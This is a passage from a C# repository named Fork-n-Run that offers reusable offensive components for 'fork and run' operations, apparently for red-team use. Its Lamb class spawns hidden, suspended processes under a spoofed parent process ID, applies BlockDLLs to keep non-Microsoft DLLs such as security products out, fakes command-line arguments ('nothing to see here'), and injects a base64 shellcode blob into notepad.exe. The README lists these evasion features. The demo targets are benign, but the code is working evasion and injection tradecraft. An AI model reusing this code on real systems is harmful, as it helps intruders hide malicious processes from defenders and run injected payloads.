EyJeCBVSIvsSIPsEEyL2UiNRfBMK9hIjXIPSYvYQb8QAAAASI1F8Eg7xncTSI1F/0g7wnIKDxAC8w9/RfDrCA8QAvMPf0XwSI1N8EG4BAAAAEGLBAsxAUiNSQRJg+gBdfBEi0X8SYv/i0X4RItV9ItN8EEDykEDwEHBwgVEM9FBwcAIRDPAwcEQQQPCQQPIQcHCB0HBwA1EM9BEM8HBwBBIg+8BdcxEiUX8RI1HBIlN8EiNTfBEiVX0iUX4QosEGTEBSI1JBEmD6AF18EU7z0GLyUEPR8+FyXQcTI1V8Iv5TCvTTIvDQ4oEAkEwAEn/wEiD7wF18EQryYvBSAPYRYvHQY1A/4AEEAF1CEH/yEWFwH/uRYXJD4UH////SItcJCBIi3QkKEiLfCQwTIt8JDhIg8QQXcPMzEiLxEiJWAhIiXAQSIl4GEyJcCBVSIvsSIPsQIoBQYPO/4Nl9ABFM8mIAjP/SI1CAUiL2kiJRehFi95IjUEBSIlF4I13AUiNTeDo9gEAAIXAD4SqAQAASI1N4OjlAQAAhcAPhJ8AAABIjU3g6NQBAACFwHRORTPJRY1RBEiNTeDowAEAAEaNDEhEK9Z17kWFyXQdSItV6EiLwkGLyUgrwYoAiAJIA9ZIiVXo6WsBAABIi0XoxgAASAPGSIlF6OlYAQAASItF4EQPthhIA8ZBi8tIiUXgI86DwQJB0et0IUiLVehFi8NJ99hBigQQiAJIA9ZBA8518kiJVejp/AAAAIv+6fUAAABEi9ZIjU3g6DIBAABIjU3gRo0UUOglAQAAhcB15kWFyXVIQYP6AnVCRIvOSI1N4OgKAQAASI1N4EaNDEjo/QAAAIXAdeZFhckPhKcAAABIi03oQYvTSPfaigQKiAFIA85FA8518+mHAAAASItN4EQzzkUr0USLzkHB4ghED7YZQYHDAP7//0UD2kgDzkiJTeBIjU3g6KUAAABIjU3gRo0MSOiYAAAAhcB15kGB+wB9AABBjUEBQQ9CwUGB+wAFAACNSAEPQshBgfuAAAAARI1BAkQPQ8FFhcB0G0iLTehBi9NI99qKBAqIAUgDzkUDxnXzSIlN6ESLzusdSItV4EiLTeiKAogBSAPOSAPWSIlN6EiJVeBFM8mF/w+EIP7//4tF6EiLdCRYK8NIi1wkUEiLfCRgTIt0JGhIg8RAXcOLURRMi8GNQv+JQRSF0nUXSIsBD7YQSP/ASIkBi8LHQRQHAAAA6wOLQRCNDADB6AeD4AFBiUgQw0yLyUWFwHQTSCvRQooECkGIAUn/wUGDwP918EiLwcPMSIl8JAhMi8mKwkmL+UGLyPOqSIt8JAhJi8HDzOsPgDoAdBA6AnUMSP/BSP/CigGEwHXrD74BD74KK8HDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="); 16 | 17 | var lamb = new Sacrificial.Lamb(ppid); 18 | var runResult = lamb.Run(@"C:\Windows\System32\PING.EXE", "nothing to see here", "-n 5 127.0.0.1"); 19 | Console.WriteLine(runResult); 20 | Console.WriteLine("--\n"); 21 | 22 | lamb = new Sacrificial.Lamb(ppid); 23 | var shellResult = lamb.Shell("there's nothing to see here", "/c ping -n 5 127.0.0.1"); 24 | Console.WriteLine(shellResult); 25 | Console.WriteLine("--\n"); 26 | 27 | lamb = new Sacrificial.Lamb(ppid); 28 | var injectionResult = lamb.Inject(@"C:\Windows\System32\notepad.exe", "nothing to see here", shellcode); 29 | Console.WriteLine(injectionResult); 30 | } 31 | } 32 | } -------------------------------------------------------------------------------- /DemoApp/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("DemoApp")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("DemoApp")] 13 | [assembly: AssemblyCopyright("Copyright © 2020")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("0b537331-512a-4475-a15e-59d12ec4bcc7")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /DemoApp/Sacrificial/Lamb.cs: -------------------------------------------------------------------------------- 1 | using DemoApp.Deception; 2 | using DemoApp.Injection; 3 | 4 | using Microsoft.Win32.SafeHandles; 5 | 6 | using System; 7 | using System.Diagnostics; 8 | using System.IO; 9 | using System.Runtime.InteropServices; 10 | using System.Text; 11 | 12 | using DemoApp.DInvoke; 13 | 14 | namespace DemoApp.Sacrificial 15 | { 16 | public class Lamb 17 | { 18 | private readonly int _ppid; 19 | private readonly bool _blockDlLs; 20 | 21 | private string _command; 22 | private string _fakeArgs; 23 | private string _realArgs; 24 | 25 | public Lamb(int ppid, bool blockDlLs = true) 26 | { 27 | _ppid = ppid; 28 | _blockDlLs = blockDlLs; 29 | } 30 | 31 | public string Run(string command, string fakeArgs, string realArgs) 32 | { 33 | _command = command; 34 | _fakeArgs = command + " " + fakeArgs; 35 | _realArgs = command + " " + realArgs; 36 | 37 | var pi = Sacrifice(out var readPipe); 38 | 39 | var mole = new Mole(pi, _realArgs); 40 | mole.SpoofArgs(); 41 | 42 | return ReadFromPipe(pi, readPipe); 43 | } 44 | 45 | public string Shell(string fakeArgs, string realArgs) 46 | { 47 | _command = @"C:\Windows\System32\cmd.exe"; 48 | _fakeArgs = fakeArgs; 49 | _realArgs = realArgs; 50 | 51 | var pi = Sacrifice(out var readPipe); 52 | 53 | var mole = new Mole(pi, _realArgs); 54 | mole.SpoofArgs(); 55 | 56 | return ReadFromPipe(pi, readPipe); 57 | } 58 | 59 | public string Inject(string spawnTo, string fakeArgs, byte[] shellcode) 60 | { 61 | _command = spawnTo; 62 | _fakeArgs = fakeArgs; 63 | 64 | var pi = Sacrifice(out var readPipe); 65 | 66 | var mole = new Mole(pi, _realArgs); 67 | mole.SpoofArgs(); 68 | 69 | var needle = new Needle(pi); 70 | needle.Inject(shellcode); 71 | 72 | return ReadFromPipe(pi, readPipe); 73 | } 74 | 75 | private Data.Win32.PROCESS_INFORMATION Sacrifice(out IntPtr readPipe, bool createSuspended = false) 76 | { 77 | // Setup handles 78 | var hSa = new Data.Win32.SECURITY_ATTRIBUTES(); 79 | hSa.nLength = (uint)Marshal.SizeOf(hSa); 80 | hSa.bInheritHandle = true; 81 | 82 | var hStdOutRead = IntPtr.Zero; 83 | var hStdOutWrite = IntPtr.Zero; 84 | var hDupStdOutWrite = IntPtr.Zero; 85 | 86 | // Create pipe 87 | Win32.CreatePipe( 88 | ref hStdOutRead, 89 | ref hStdOutWrite, 90 | ref hSa, 91 | 0); 92 | 93 | Win32.SetHandleInformation( 94 | hStdOutRead, 95 | Data.Win32.HandleFlags.Inherit, 96 | 0); 97 | 98 | // Initialise Startup Info 99 | var siEx = new Data.Win32.STARTUPINFOEX(); 100 | siEx.Startupinfo.cb = (uint)Marshal.SizeOf(siEx); 101 | siEx.Startupinfo.dwFlags = Data.Win32.STARTF_USESHOWWINDOW | Data.Win32.STARTF_USESTDHANDLES; 102 | siEx.Startupinfo.wShowWindow = Data.Win32.SW_HIDE; 103 | 104 | var lpValueProc = IntPtr.Zero; 105 | 106 | try 107 | { 108 | var lpSize = IntPtr.Zero; 109 | var dwAttributeCount = _blockDlLs ? 2 : 1; 110 | 111 | Win32.InitializeProcThreadAttributeList( 112 | IntPtr.Zero, 113 | dwAttributeCount, 114 | ref lpSize); 115 | 116 | siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize); 117 | 118 | Win32.InitializeProcThreadAttributeList( 119 | siEx.lpAttributeList, 120 | dwAttributeCount, 121 | ref lpSize); 122 | 123 | // BlockDLLs 124 | if (_blockDlLs) 125 | { 126 | var lpMitigationPolicy = Marshal.AllocHGlobal(IntPtr.Size); 127 | 128 | Marshal.WriteInt64( 129 | lpMitigationPolicy, 130 | Data.Win32.PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON 131 | ); 132 | 133 | Win32.UpdateProcThreadAttributeList( 134 | siEx.lpAttributeList, 135 | (IntPtr)Data.Win32.PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, 136 | lpMitigationPolicy); 137 | } 138 | 139 | var hParent = Process.GetProcessById(_ppid).Handle; 140 | 141 | // PPID spoof 142 | lpValueProc = Marshal.AllocHGlobal(IntPtr.Size); 143 | 144 | Marshal.WriteIntPtr( 145 | lpValueProc, 146 | hParent 147 | ); 148 | 149 | Win32.UpdateProcThreadAttributeList( 150 | siEx.lpAttributeList, 151 | (IntPtr)Data.Win32.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, 152 | lpValueProc); 153 | 154 | // Duplicate handles 155 | using var self = Process.GetCurrentProcess(); 156 | 157 | Win32.DuplicateHandle( 158 | self.Handle, 159 | hStdOutWrite, 160 | hParent, 161 | ref hDupStdOutWrite, 162 | 0, 163 | true, 164 | Data.Win32.DuplicateOptions.DuplicateCloseSource | Data.Win32.DuplicateOptions.DuplicateSameAccess); 165 | 166 | siEx.Startupinfo.hStdError = hDupStdOutWrite; 167 | siEx.Startupinfo.hStdOutput = hDupStdOutWrite; 168 | 169 | // Start Process 170 | Win32.CreateProcess( 171 | _command, 172 | _fakeArgs, 173 | Data.Win32.EXTENDED_STARTUPINFO_PRESENT | Data.Win32.CREATE_NO_WINDOW | Data.Win32.CREATE_SUSPENDED, 174 | siEx, 175 | out var pi); 176 | 177 | readPipe = hStdOutRead; 178 | return pi; 179 | } 180 | finally 181 | { 182 | // Free attribute list 183 | Win32.DeleteProcThreadAttributeList(siEx.lpAttributeList); 184 | Marshal.FreeHGlobal(siEx.lpAttributeList); 185 | Marshal.FreeHGlobal(lpValueProc); 186 | } 187 | } 188 | 189 | private static string ReadFromPipe(Data.Win32.PROCESS_INFORMATION pi, IntPtr readPipe) 190 | { 191 | var hSafe = new SafeFileHandle(readPipe, false); 192 | var fileStream = new FileStream(hSafe, FileAccess.Read); 193 | 194 | var result = new StringBuilder(); 195 | 196 | using (var reader = new StreamReader(fileStream)) 197 | { 198 | var exit = false; 199 | 200 | try 201 | { 202 | do 203 | { 204 | // Has process has signaled to exit? 205 | if (Win32.WaitForSingleObject(pi.hProcess, 100) == 0) 206 | { 207 | exit = true; 208 | } 209 | 210 | // Get number of bytes in the pipe waiting to be read 211 | uint bytesToRead = 0; 212 | Win32.PeekNamedPipe(readPipe, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref bytesToRead, IntPtr.Zero); 213 | 214 | // If there are no bytes and process has closed, let's bail 215 | // If this evaluates to false, we automatically loop again 216 | if (bytesToRead == 0 && exit) 217 | { 218 | break; 219 | } 220 | 221 | // Otherwise, read from the pipe 222 | var buf = new char[bytesToRead]; 223 | reader.Read(buf, 0, buf.Length); 224 | result.Append(new string(buf)); 225 | 226 | } while (true); 227 | } 228 | finally 229 | { 230 | hSafe.Close(); 231 | } 232 | } 233 | 234 | // Close remaining handles 235 | Win32.CloseHandle(readPipe); 236 | Win32.CloseHandle(pi.hProcess); 237 | Win32.CloseHandle(pi.hThread); 238 | 239 | // Return result 240 | return result.ToString(); 241 | } 242 | } 243 | } -------------------------------------------------------------------------------- /DemoApp/app.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /DemoAssembly/DemoAssembly.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {5C27FD9A-CB11-4CCC-AE18-9833CFADF80E} 8 | Exe 9 | DemoAssembly 10 | DemoAssembly 11 | v4.8 12 | 512 13 | true 14 | latestmajor 15 | 16 | 17 | AnyCPU 18 | true 19 | full 20 | false 21 | bin\Debug\ 22 | DEBUG;TRACE 23 | prompt 24 | 4 25 | 26 | 27 | AnyCPU 28 | pdbonly 29 | true 30 | bin\Release\ 31 | TRACE 32 | prompt 33 | 4 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | -------------------------------------------------------------------------------- /DemoAssembly/Program.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | 3 | namespace DemoAssembly 4 | { 5 | class Program 6 | { 7 | static void Main(string[] args) 8 | { 9 | Console.WriteLine("Hello from .NET Assembly"); 10 | } 11 | } 12 | } -------------------------------------------------------------------------------- /DemoAssembly/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("DemoAssembly")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("DemoAssembly")] 13 | [assembly: AssemblyCopyright("Copyright © 2020")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("5c27fd9a-cb11-4ccc-ae18-9833cfadf80e")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Fork-n-Run.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30428.66 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoApp", "DemoApp\DemoApp.csproj", "{0B537331-512A-4475-A15E-59D12EC4BCC7}" 7 | EndProject 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DemoAssembly", "DemoAssembly\DemoAssembly.csproj", "{5C27FD9A-CB11-4CCC-AE18-9833CFADF80E}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Any CPU = Debug|Any CPU 13 | Release|Any CPU = Release|Any CPU 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {0B537331-512A-4475-A15E-59D12EC4BCC7}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {0B537331-512A-4475-A15E-59D12EC4BCC7}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {0B537331-512A-4475-A15E-59D12EC4BCC7}.Release|Any CPU.ActiveCfg = Release|Any CPU 19 | {0B537331-512A-4475-A15E-59D12EC4BCC7}.Release|Any CPU.Build.0 = Release|Any CPU 20 | {5C27FD9A-CB11-4CCC-AE18-9833CFADF80E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 21 | {5C27FD9A-CB11-4CCC-AE18-9833CFADF80E}.Debug|Any CPU.Build.0 = Debug|Any CPU 22 | {5C27FD9A-CB11-4CCC-AE18-9833CFADF80E}.Release|Any CPU.ActiveCfg = Release|Any CPU 23 | {5C27FD9A-CB11-4CCC-AE18-9833CFADF80E}.Release|Any CPU.Build.0 = Release|Any CPU 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {2DC0E398-3DC9-4CFA-A97F-08EAA0670E5E} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ## Fork-n-Run 2 | 3 | Experimenting with reusable components for fork n' run operations. Supports: 4 | 5 | - PPID Spoofing 6 | - BlockDLLs 7 | - Command Line Argument Spoofing 8 | - Output returned over anonymous pipes 9 | 10 | ### Example 11 | ```text 12 | C:\>DemoApp.exe 8256 13 | 14 | Pinging 127.0.0.1 with 32 bytes of data: 15 | Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 16 | Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 17 | Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 18 | Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 19 | Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 20 | 21 | Ping statistics for 127.0.0.1: 22 | Packets: Sent = 5, Received = 5, Lost = 0 (0% loss), 23 | Approximate round trip times in milli-seconds: 24 | Minimum = 0ms, Maximum = 0ms, Average = 0ms 25 | 26 | -- 27 | 28 | 29 | Pinging 127.0.0.1 with 32 bytes of data: 30 | Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 31 | Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 32 | Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 33 | Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 34 | Reply from 127.0.0.1: bytes=32 time<1ms TTL=128 35 | 36 | Ping statistics for 127.0.0.1: 37 | Packets: Sent = 5, Received = 5, Lost = 0 (0% loss), 38 | Approximate round trip times in milli-seconds: 39 | Minimum = 0ms, Maximum = 0ms, Average = 0ms 40 | 41 | -- 42 | 43 | Hello from .NET Assembly 44 | ``` --------------------------------------------------------------------------------